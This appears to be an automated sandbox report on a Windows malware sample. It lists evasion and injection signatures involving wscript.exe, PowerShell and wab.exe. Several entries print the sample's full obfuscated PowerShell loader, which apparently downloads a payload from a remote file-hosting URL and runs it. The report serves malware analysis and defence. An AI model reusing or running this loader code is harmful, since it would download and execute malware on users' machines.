Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 24400000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5536	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4388	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7375	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2318	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3806	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4054	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764	Thread sleep count: 7375 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128	Thread sleep count: 2318 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6164	Thread sleep count: 3806 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6164	Thread sleep count: 4054 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99734s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99625s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99516s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99391s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99276s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98813s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98703s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98593s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98484s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98375s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98266s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98141s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98029s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97922s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97813s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97688s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96862s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96735s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96610s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96485s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96360s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96235s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95860s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95735s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95610s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95464s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99734	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99625	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99391	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99276	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98813	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98593	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98484	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98375	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98266	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98141	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98029	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97922	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97813	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96862	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96735	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96610	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96485	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96360	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96235	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95860	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95735	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95610	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95464	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wab.exe, 00000009.00000002.2928711448.0000000006AC8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928711448.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2106027892.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.2329475776.000001D971C5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla.(

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_078D0638 LdrInitializeThunk,

4_2_078D0638

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29CFA44			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 